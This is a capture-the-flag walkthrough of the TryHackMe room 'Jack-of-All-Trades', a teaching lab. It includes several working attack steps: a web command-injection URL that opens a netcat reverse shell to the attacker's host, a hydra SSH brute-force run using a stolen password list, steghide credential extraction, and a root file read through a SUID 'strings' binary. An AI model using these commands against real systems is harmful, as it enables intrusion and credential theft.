THM Writeup – Jack-of-All-Trades

THM Writeup – Jack-of-All-Trades

THM Writeup - Jack-of-All-Trades

Boot-to-root originally designed for Securi-Tay 2020

Room: Jack-of-All-Trades

Difficulty: Easy

Operating System: Linux

Author: MuirlandOracle

Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of a forgetful old toymaker and bring this lunatic down?

Add IP address to your hosts file:

echo '10.10.10.140    jack.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv jack.thm

PORT     STATE SERVICE REASON
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80 jack.thm

PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (EdDSA)

There are 2 ports open, however they are switched – usually a webserver is on port 80 and SSH on port 22. In this case:

  • SSH is on port 80
  • webserver is on port 22

Directory scan the web application:

gobuster dir -u http://jack.thm:22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html


===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/recovery.php (Status: 200)
/server-status (Status: 403)
===============================================================

When we try to browse web application on port 22, we get:

jack.thm:22 restricted port

We have to enable a restricted port – read more here – follow the instructions to enable restricted port 22.

Now browse to http://jack.thm:22

Jack-of-all-trades web app

As we can read “If you employ me you might find random notes lying around as reminders” let’s view the page source:

Jack-of-all-trades page source

We found a string that looks like base64 encoded.

Use e.g. CyberChef to decode it:

cyberchef base64 decode

Now browse to http://jack.thm:22/recovery.php

jack.thm:22 recovery.php

I tried to log in as jack and johny with the password we found earlier, but no luck. So I viewed the page source again:

jack.thm:22/recovery.php page source

Again we found a string that looks like base64 encoded:

cyberchef base64 decode 2

So let’s browse to http://bit.ly/2TvYQ2S – it redirects us to https://en.wikipedia.org/wiki/Stegosauria:

stegosauria wikipedia

Ok the credentials are probably hidden in the stego picture on the homepage.

Download the stegosaurus picture from homepage and check if there is anything hidden – as passphrase use the password/phrase we found earlier:

root@ip-10-10-112-247:~# steghide info stego.jpg 
"stego.jpg":
  format: jpeg
  capacity: 1.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "creds.txt":
    size: 58.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Bingo, so let’s extract the hidden .txt file and then read it:

root@ip-10-10-112-247:~# steghide extract -sf stego.jpg 
Enter passphrase: 
wrote extracted data to "creds.txt".
root@ip-10-10-112-247:~# cat creds.txt 
Hehe. Gotcha!

You're on the right path, but wrong image!

Lmao, so do the same with the image of a toy:

root@ip-10-10-112-247:~# steghide info jackinthebox.jpg 
"jackinthebox.jpg":
  format: jpeg
  capacity: 5.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Nothing again, let’s try to do the same with the header image – first image on the homepage:

root@ip-10-10-112-247:~# steghide info header.jpg 
"header.jpg":
  format: jpeg
  capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "cms.creds":
    size: 93.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Great, now extract the .creds file and read it:

root@ip-10-10-112-247:~# steghide extract -sf header.jpg 
Enter passphrase: 
wrote extracted data to "cms.creds".
root@ip-10-10-112-247:~# cat cms.creds 
Here you go Jack. Good thing you thought ahead!

Username: [REDACTED]
Password: [REDACTED]

Now go back to the recovery page http://jack.thm:22/recovery.php and login using credentials we have just found:

jack cms logged in

User Flag

Hm, great, RCE through web application – first try same basic command like id:

http://jack.thm:22/[REDACTED]/index.php?cmd=id
jack cms cmd id

Run a listener:

nc -lnvp 4242

“Browse” to:

http://jack.thm:22/[REDACTED]/index.php?cmd=nc -e /bin/sh 10.10.112.247 4242

and we received a reverse shell:

reverse shell

Look around:

ls -la /home
total 16
drwxr-xr-x  3 root root 4096 Feb 29  2020 .
drwxr-xr-x 23 root root 4096 Feb 29  2020 ..
drwxr-x---  3 jack jack 4096 Feb 29  2020 jack
-rw-r--r--  1 root root  408 Feb 29  2020 jacks_password_list
cat /home/jacks_password_list
*hc[REDACTED]=0K
eN<[REDACTED]I5,
X<([REDACTED]MGC
,,a[REDACTED]afb
ITM[REDACTED]?>@
0Hg[REDACTED]8yF
sjR[REDACTED]ITu
[8V[REDACTED][WB
yTq[REDACTED]}PD
Sc.[REDACTED]C4}
9;}[REDACTED]X.T
M41[REDACTED]3%p
GZx[REDACTED]SO<
.MV[REDACTED]cAC
2fh[REDACTED]f51
TDF[REDACTED]hBO
v]X[REDACTED]3EF
9iY[REDACTED]4d1
8TI[REDACTED]AY^
SeU[REDACTED]+yt
n.F[REDACTED]s5d
8lN[REDACTED][pM
z@e[REDACTED]Dz@
ow5[REDACTED]rSo

We found jack’s passwords, let’s try to use hydra to crack SSH.

First save the passwords to a file and the run hydra against SSH:

hydra -l jack -P jackpass ssh://jack.thm -s 80

[80][ssh] host: jack.thm   login: jack   password: [REDACTED]

Now use these credentials to login via SSH:

root@ip-10-10-112-247:~# ssh jack@jack.thm -p 80
jack@jack.thm's password: 
jack@jack-of-all-trades:~$

Find the user flag:

jack@jack-of-all-trades:~$ ls -la
total 312
drwxr-x--- 3 jack jack   4096 Feb 29  2020 .
drwxr-xr-x 3 root root   4096 Feb 29  2020 ..
lrwxrwxrwx 1 root root      9 Feb 29  2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack    220 Feb 29  2020 .bash_logout
-rw-r--r-- 1 jack jack   3515 Feb 29  2020 .bashrc
drwx------ 2 jack jack   4096 Feb 29  2020 .gnupg
-rw-r--r-- 1 jack jack    675 Feb 29  2020 .profile
-rwxr-x--- 1 jack jack 293302 Feb 28  2020 user.jpg

user.jpg is probably our user flag, download it to your attacking machine

Run a python http server on the target machine:

jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 ...

Download the user.jpg to your attacking machine:

root@ip-10-10-112-247:~# wget http://jack.thm:9000/user.jpg
--2022-02-03 09:20:12--  http://jack.thm:9000/user.jpg
Resolving jack.thm (jack.thm)... 10.10.10.140
Connecting to jack.thm (jack.thm)|10.10.10.140|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293302 (286K) [image/jpeg]
Saving to: \u2018user.jpg\u2019

user.jpg            100%[===================>] 286.43K  --.-KB/s    in 0.003s  

2022-02-03 09:20:12 (96.8 MB/s) - \u2018user.jpg\u2019 saved [293302/293302]

Open the .jpg file:

user.jpg user flag

Root Flag

Now to escalate our privileges I tried basic vectors:

sudo -l
cat /etc/crontab
getcap -r / 2>/dev/null

but no luck.

Then I tried SUID bits:

jack@jack-of-all-trades:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su

strings is the one that stands out.

Check GTFOBins:

gtfobins strings suid

So we just need to “read” the file with strings command:

jack@jack-of-all-trades:~$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: [REDACTED]

Do you like this writeup? Check out other THM Writeups.

Comments are closed.